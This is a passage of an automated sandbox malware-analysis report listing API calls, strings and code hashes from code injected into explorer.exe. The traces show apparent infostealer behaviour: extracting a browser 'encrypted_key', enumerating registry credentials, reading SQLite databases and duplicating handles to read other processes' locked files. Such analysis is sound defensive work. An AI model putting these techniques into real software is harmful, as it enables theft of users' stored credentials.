                          • Part of subcall function 03001011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001027
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 030043B9
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                        • String ID:
                        • API String ID: 801677237-0
                        • Opcode ID: 91adf324032bee02c6370e9d13755344167296e9c3a8ae605c9c60ad1e819b41
                        • Instruction ID: e1377273907207a3772716927b664b48c40ef3eea0de9892e3b2803165c1804a
                        • Opcode Fuzzy Hash: 91adf324032bee02c6370e9d13755344167296e9c3a8ae605c9c60ad1e819b41
                        • Instruction Fuzzy Hash: 671190B5105305BFE715EB21CC48DBB77EDEB88304F40562EB98AD2140EB759D088A62
                        APIs
                        • memset.NTDLL ref: 0300B8D5
                        • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0300B96F
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: CreateFilememset
                        • String ID: psow$winOpen
                        • API String ID: 2416746761-4101858489
                        • Opcode ID: 1ecd7665be43a6d54a2fb60e1737ef4ad86b2fe289354242ac55177f2ee7dee6
                        • Instruction ID: 6139c2c720d6aec589e4a37a3f9aab9e619c160190dd5446c8f2dc07d92b9a48
                        • Opcode Fuzzy Hash: 1ecd7665be43a6d54a2fb60e1737ef4ad86b2fe289354242ac55177f2ee7dee6
                        • Instruction Fuzzy Hash: 2471A071A067069FE750DF28C88075ABBE4FF89324F044A2DF8A4AB2C0D774D954CB92
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003067000.00000040.80000000.00040000.00000000.sdmp, Offset: 03067000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3067000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c94b97f536b20fdb99eecad6006625bcd6adf520ea2aaf245373c022f98f18b0
                        • Instruction ID: 6e06a6ab4964ab4e027fbecdb93edf2d3062eb4bd4e2918f24769a1a48383d62
                        • Opcode Fuzzy Hash: c94b97f536b20fdb99eecad6006625bcd6adf520ea2aaf245373c022f98f18b0
                        • Instruction Fuzzy Hash: BFA149B29167525FD721CF78CCD0AA4BBE4EB42224B1C0AADC5D1CBACAE770940AC751
                        APIs
                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A1E
                        • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A3C
                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A75
                        • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A98
                          • Part of subcall function 03001011: GetProcessHeap.KERNEL32(00000000,00000000,?,03001A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2), ref: 03001020
                          • Part of subcall function 03001011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001027
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: HeapQueryValue$CloseFreeOpenProcess
                        • String ID:
                        • API String ID: 217796345-0
                        • Opcode ID: c27b441f74fd42b1221f80b0e7b1a6f6c5d648b930de4d3fb91ab8faf79ca08a
                        • Instruction ID: e51d09711caecca268b5ee3221f19327eb7ac01008891437df83f23e35fb1075
                        • Opcode Fuzzy Hash: c27b441f74fd42b1221f80b0e7b1a6f6c5d648b930de4d3fb91ab8faf79ca08a
                        • Instruction Fuzzy Hash: 1F21A37A20A3456FF729CA21CD44F7BB7EDEBCA754F080A2DF985A2180E725C9018621
                        APIs
                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 03001ED5
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03001F0C
                        • RegCloseKey.ADVAPI32(?), ref: 03001F98
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03001F82
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                        • String ID:
                        • API String ID: 1077800024-0
                        • Opcode ID: 3d31c8304c0c21c524f2629126d9118f73c6bc7b4832ae0a6e530eb42de5c795
                        • Instruction ID: 8980fe11b9b34d64317338f7e0baf68df79870e4ccd678301a189a750819b35e
                        • Opcode Fuzzy Hash: 3d31c8304c0c21c524f2629126d9118f73c6bc7b4832ae0a6e530eb42de5c795
                        • Instruction Fuzzy Hash: A9217C79209305AFE709AB21CC48E7BBAEDEFC8354F40492DF49992190DB75C9059B22
                        APIs
                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,03003E1E,00000000,?,03003FA8), ref: 03001C46
                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,03003FA8), ref: 03001C56
                        • CloseHandle.KERNEL32(00000000,?,03003FA8), ref: 03001C91
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,03003FA8), ref: 03001C76
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                        • String ID:
                        • API String ID: 2517252058-0
                        • Opcode ID: ab2a3b8ac97307ff6c11b2f12d81e629eeac1c7c7762d769094d5d99db4015da
                        • Instruction ID: c4bc240dcea6fa3771d55b62eb0ce53cee9f33a24f195e0003a0656a3fc52436
                        • Opcode Fuzzy Hash: ab2a3b8ac97307ff6c11b2f12d81e629eeac1c7c7762d769094d5d99db4015da
                        • Instruction Fuzzy Hash: 8DF0A43620231C7BE728AA2ADC8CE7B7A9CDB467F6F150719F515931C0EB5798054171
                        APIs
                        • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,03003E30,00000000,00000000,?,03003FA8), ref: 03002FC1
                        • lstrlen.KERNEL32("encrypted_key":",?,03003FA8), ref: 03002FCE
                        • StrStrIA.SHLWAPI("encrypted_key":",0305692C,?,03003FA8), ref: 03002FDD
                          • Part of subcall function 0300190B: lstrlen.KERNEL32(?,?,?,?,00000000,03002783), ref: 0300192B
                          • Part of subcall function 0300190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,03002783), ref: 03001930
                          • Part of subcall function 0300190B: lstrcat.KERNEL32(00000000,?), ref: 03001946
                          • Part of subcall function 0300190B: lstrcat.KERNEL32(00000000,00000000), ref: 0300194A
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$lstrcat
                        • String ID: "encrypted_key":"
                        • API String ID: 493641738-877455259
                        • Opcode ID: bb1db2b98fa7de1b05a45c6a07e868020491f595eaf9adf35435f74f03e09513
                        • Instruction ID: 322300049edf84ecc027e339839b4ca98bc5fb5fd785cd68bbb298d90ebc3b36
                        • Opcode Fuzzy Hash: bb1db2b98fa7de1b05a45c6a07e868020491f595eaf9adf35435f74f03e09513
                        • Instruction Fuzzy Hash: DDE02B267077281FA3E1FBB91C48867BE8C9E0605034C0074F541C7142DE578401C2A4
                        APIs
                        • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0300BB40
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID: winDelete
                        • API String ID: 3188754299-3936022152
                        • Opcode ID: 12618c03349c2307d52616f90e753af007bd499517e01e94db114288a0c32395
                        • Instruction ID: 0999a13139be5ba1385ffdd1317b22adc82ed7bdcb05d181837dc747a3573067
                        • Opcode Fuzzy Hash: 12618c03349c2307d52616f90e753af007bd499517e01e94db114288a0c32395
                        • Instruction Fuzzy Hash: 6911A135B06308EBFB10EB6988459BDB7B9DFC1760F144565E802DB2C8DFB4CA019752
                        APIs
                          • Part of subcall function 03001011: GetProcessHeap.KERNEL32(00000000,00000000,?,03001A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2), ref: 03001020
                          • Part of subcall function 03001011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001027
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 03002EE4
                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 03002F54
                        • RegCloseKey.KERNELBASE(?), ref: 03002F62
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                        • String ID:
                        • API String ID: 1066184869-0
                        • Opcode ID: 75ede4cfab9c6146d2e44b3d2eb950851fbf9d1a5c59598c7ef430712ce1f8db
                        • Instruction ID: cf6a39fb4387ecc698b3dd7ce2323149f5258b7a5217f41d273d9d102789fc8c
                        • Opcode Fuzzy Hash: 75ede4cfab9c6146d2e44b3d2eb950851fbf9d1a5c59598c7ef430712ce1f8db
                        • Instruction Fuzzy Hash: A901A739206350ABD719EF22DC08EBF7B9DEFC4390F00442DF54586184CB758805DBA1
                        APIs
                        • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 03009FF8
                        Strings
                        • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0300A00E
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: CreateHeap
                        • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                        • API String ID: 10892065-982776804
                        • Opcode ID: f319df39e38252de830cc9753156719ab014fd90a250dfc7e8298066b6268f9f
                        • Instruction ID: 90859c0778bf4375dbe9630d82b755d7e78c5318f074c0dff21baa32101093fc
                        • Opcode Fuzzy Hash: f319df39e38252de830cc9753156719ab014fd90a250dfc7e8298066b6268f9f
                        • Instruction Fuzzy Hash: 77F0F072B46341BAF730AA54AC88F7B679CDB84B85F140829F946D62C5E674AC008320
                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,03002E83,PathToExe,00000000,00000000), ref: 03001B16
                          • Part of subcall function 03001011: GetProcessHeap.KERNEL32(00000000,00000000,?,03001A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2), ref: 03001020
                          • Part of subcall function 03001011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001027
                          • Part of subcall function 030019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A1E
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A3C
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A75
                          • Part of subcall function 030019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A98
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 03001B40
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                        • API String ID: 2162223993-2036018995
                        • Opcode ID: 2dbc95621e45cc2182cb6b1b67d9c6db347dc5b2269bdf3c4203ca6ea6b389b5
                        • Instruction ID: 461f917ec068bc656cbd9d498d648f207a50acff7236bf7f2aa79507014fb4e7
                        • Opcode Fuzzy Hash: 2dbc95621e45cc2182cb6b1b67d9c6db347dc5b2269bdf3c4203ca6ea6b389b5
                        • Instruction Fuzzy Hash: D1F0903E603A4827F619A96BCC80EA7768ECBC53A6B060069F55987280EE577C015264
                        APIs
                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0300A35F
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID: winSeekFile
                        • API String ID: 973152223-3168307952
                        • Opcode ID: c13edcac75548efff6e2c3294a7d4f9f392eaf9468e0c4d83775cbbdea0452f8
                        • Instruction ID: c13bee621eb21d74cb1c35010e6e4e924b728c3e9ffc9aa290855b6803570c47
                        • Opcode Fuzzy Hash: c13edcac75548efff6e2c3294a7d4f9f392eaf9468e0c4d83775cbbdea0452f8
                        • Instruction Fuzzy Hash: 04F09A30716304AFE711EE74DC009ABB7AAEB44320F148669FC61CA2C4EA70DD0096A1
                        APIs
                        • RtlAllocateHeap.NTDLL(05220000,00000000,?), ref: 03009EB5
                        Strings
                        • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 03009ECD
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                        • API String ID: 1279760036-667713680
                        • Opcode ID: 749abf2a17348ac51b31408d7362f2296a6d4d898857f0f1df1f999bab305ba6
                        • Instruction ID: 441fef0facb2c7a2170930100e3fa49005865021fdc8b0944e229903cdd6440b
                        • Opcode Fuzzy Hash: 749abf2a17348ac51b31408d7362f2296a6d4d898857f0f1df1f999bab305ba6
                        • Instruction Fuzzy Hash: 9AE0C237A462107BD2127684AC04F6FB7A9DBC4F50F050015FA00A665DC778AC01D7A2
                        APIs
                        • RtlFreeHeap.NTDLL(05220000,00000000,?), ref: 03009EF8
                        Strings
                        • failed to HeapFree block %p (%lu), heap=%p, xrefs: 03009F0E
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: FreeHeap
                        • String ID: failed to HeapFree block %p (%lu), heap=%p
                        • API String ID: 3298025750-4030396798
                        • Opcode ID: ed4157f60738415e4025f3ebeb9ea9b45654c077a6b420fb8114ebf4f9bee78a
                        • Instruction ID: fdb511935cf1c368d4f44ddf21a2acd63b06cfd186e5906dbd3203819ff11793
                        • Opcode Fuzzy Hash: ed4157f60738415e4025f3ebeb9ea9b45654c077a6b420fb8114ebf4f9bee78a
                        • Instruction Fuzzy Hash: D6D0127614A301BBE205BA549C05F3B77BD9BD5E00F480418F514550AED7686051AB65
                        APIs
                        • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: ChangeCloseCreateFileFindNotification
                        • String ID:
                        • API String ID: 727422849-0
                        • Opcode ID: 1ab9bb2f21ef2a8f6c63f0697991aaa425c34b4eadb0755b9b77019a1ed70cb4
                        • Instruction ID: 201f2ebd9c2f59f3f5181936a61ea1d0de5511ba5b759771bb0d0288e9e64be5
                        • Opcode Fuzzy Hash: 1ab9bb2f21ef2a8f6c63f0697991aaa425c34b4eadb0755b9b77019a1ed70cb4
                        • Instruction Fuzzy Hash: 22D0127625373062E6F966357C0CEA7AE5CDF027B5F481614B61DD50C4E715888781E0
                        APIs
                          • Part of subcall function 03001162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0300116F
                        • GetProcessHeap.KERNEL32(00000000,00000000,?,03001A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2), ref: 03001020
                        • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001027
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Heap$FreeProcessQueryVirtual
                        • String ID:
                        • API String ID: 2580854192-0
                        • Opcode ID: 29669bc99e74cb4808287413a78084c544d871d96a818777d3442f7d764ea8d6
                        • Instruction ID: 30a1525e58240bd1ef59b45652c5af93c31e6b3d8d309c4eae23147db2d06c1d
                        • Opcode Fuzzy Hash: 29669bc99e74cb4808287413a78084c544d871d96a818777d3442f7d764ea8d6
                        • Instruction Fuzzy Hash: F3C08C3500332052DAA877A8790CBDB2B08CF89322F080041B48297185CEBA880086A0
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: ExitInitializeProcess
                        • String ID:
                        • API String ID: 2609639641-0
                        • Opcode ID: 8a0239d4c122c31ed40561ebb3622eebc57428c02a0980091b75807acf7fcc5d
                        • Instruction ID: 975511175d1c563fcaec1a7f4a39d770cb3f824d9c9702116873af970c491e7b
                        • Opcode Fuzzy Hash: 8a0239d4c122c31ed40561ebb3622eebc57428c02a0980091b75807acf7fcc5d
                        • Instruction Fuzzy Hash: EFC04C342477044BF7807BE15C0D71A3558AB00712F446014E3098A0C4DA5A40008A2A
                        APIs
                        • RtlZeroMemory.NTDLL(?,00000018), ref: 030012B5
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: MemoryZero
                        • String ID:
                        • API String ID: 816449071-0
                        • Opcode ID: 1c452d6cdc6f4328c3ba483dfb2e8570519c78aca25478ea9d7864e09f208617
                        • Instruction ID: 47278accfd70e3ddba6fa10cdea71ae88d50d4bf3f41b8a8c97cdd3f02c522b6
                        • Opcode Fuzzy Hash: 1c452d6cdc6f4328c3ba483dfb2e8570519c78aca25478ea9d7864e09f208617
                        • Instruction Fuzzy Hash: 2F11F8B5A02209AFEB14EFA9D984ABFBBFCEB08341F544429F945E7240D735D900CB64
                        APIs
                        • GetFileAttributesW.KERNELBASE(00000000,00000000,03002C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 03001BAA
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 781ebd3576f590403be477aaac173ed7ec4d05e0d0b359be8ac018552a60a931
                        • Instruction ID: acbd0d5b715d97e22df62e038c29e085a3141ccbabd779a400aea76d07cb3cdb
                        • Opcode Fuzzy Hash: 781ebd3576f590403be477aaac173ed7ec4d05e0d0b359be8ac018552a60a931
                        • Instruction Fuzzy Hash: 05D0A937E0753082AAA8A6783844893E2C06A0067531E03B4FC26F30C4E329CC8242C0
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0300158A), ref: 03001056
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 5e9513dd84551d34b04031c4f54db2860c78d4b9d1bdc52271deabcfbef52a39
                        • Instruction ID: a1eded6c1c4a0f02b24fc5a8281acd09271002b1cd66740d9ed7c26f0dd19ad5
                        • Opcode Fuzzy Hash: 5e9513dd84551d34b04031c4f54db2860c78d4b9d1bdc52271deabcfbef52a39
                        • Instruction Fuzzy Hash: F1A001B17963046AFEA96762AE1BF1629289740B02F502244B309680C456E975008529
                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,03004A5B,?,?,00000000,?,?,?,?,03004B66,?), ref: 03001065
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 6f8281b6b9dfa92dfe3cc73ee17a3fe46b84a92bd59f48bec7492d346d9e8fef
                        • Instruction ID: 2eacdbeba056f77cb7fc3833a8d9a98f49ddfb3ef6a3438e25096e758ee2fe4a
                        • Opcode Fuzzy Hash: 6f8281b6b9dfa92dfe3cc73ee17a3fe46b84a92bd59f48bec7492d346d9e8fef
                        • Instruction Fuzzy Hash: BCA0027069170466EEF467245D0AF1626146740B02F6455447281A90C54DAAE0448A1C
                        APIs
                        • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 030034C0
                          • Part of subcall function 030033C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 03003401
                        • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,030037A8), ref: 030034E9
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0300351E
                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 03003541
                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 03003586
                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0300358F
                        • lstrcmpiW.KERNEL32(00000000,File), ref: 030035B6
                        • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 030035DE
                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 030035F6
                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 03003606
                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0300361E
                        • GetFileSize.KERNEL32(?,00000000), ref: 03003631
                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 03003658
                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0300366B
                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 03003681
                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 030036AD
                        • CloseHandle.KERNEL32(?), ref: 030036C0
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,030037A8), ref: 030036F5
                          • Part of subcall function 03001C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03001CC0
                          • Part of subcall function 03001C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03001CDA
                          • Part of subcall function 03001C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03001CE6
                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,030037A8), ref: 03003707
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                        • String ID: File
                        • API String ID: 3915112439-749574446
                        APIs
                        • memcmp.NTDLL ref: 03054502
                        • memcmp.NTDLL ref: 0305475F
                        • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 03054803
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memcmp$memcpy
                        • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                        • API String ID: 231171946-1096842476
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,$-x0$Inf$NaN
                        • API String ID: 0-2346028406
                        APIs
                          • Part of subcall function 03006AAA: memset.NTDLL ref: 03006AC5
                        • memset.NTDLL ref: 03025F53
